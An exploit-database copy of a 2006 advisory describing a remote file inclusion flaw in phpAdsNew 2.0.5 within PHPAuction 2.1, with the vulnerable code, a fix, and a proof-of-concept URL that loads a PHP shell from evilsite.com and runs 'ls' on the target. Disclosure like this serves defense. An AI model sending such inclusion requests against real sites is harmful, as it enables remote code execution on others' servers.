Advertisement






PHPAuction 2.1 (maybe higher) with phpAdsNew 2.0.5 RFI

CVE Category Price Severity
N/A CWE-284: Improper Access Control Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2006-08-07
CPE PURL
cpe:cpe:/a:phpauction:phpauction:2.1 pkg:pkg:exploitalert/phpauction-2-1-maybe-higher-with-phpadsnew-2-0-5-rfi
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080029

Below is a copy:

+--------------------------------------------------------------------

+

+ PHPAuction 2.1 with phpAdsNew 2.0.5 Remote File Inclusion

+

+--------------------------------------------------------------------

+

+ Affected Software .: PHPAuction 2.1 (maybe higher) with phpAdsNew,

+                      phpAdsNew 2.0.5 (maybe higher)

+ Venedor ...........: http://www.phpauction.net,

+                      http://phpadsnew.com

+ Class .............: Remote File Inclusion in /phpAdsNew/view.inc.php

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: Philipp Niedziela

+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_264.htm

+ Contact ...........: webmaster[at]bb-pcsecurity[.]de

+

+--------------------------------------------------------------------

+

+ Code /phpAdsNew/view.inc.php:

+

+ .....

+ // Include required files

+ require ("$phpAds_path/dblib.php");

+ require ("$phpAds_path/lib-expire.inc.php");

+ .....

+

+--------------------------------------------------------------------

+

+ $phpAds_path is not properly sanitized before being used.

+

+--------------------------------------------------------------------

+

+ Solution:

+ Declare $phpAds_path before using.

+

+--------------------------------------------------------------------

+ PoC:

+ Place a PHPShell on a remote location:

+ http://evilsite.com/dblib.php/index.html

+

+ http://[target]/phpAdsNew/view.inc.php?phpAds_path=http://evilsite.com/d
blib.php/&cmd=ls

+

+--------------------------------------------------------------------

+

+ Greets:

+ Krini&Lenni

+

+-------------------------[ E O F ]----------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum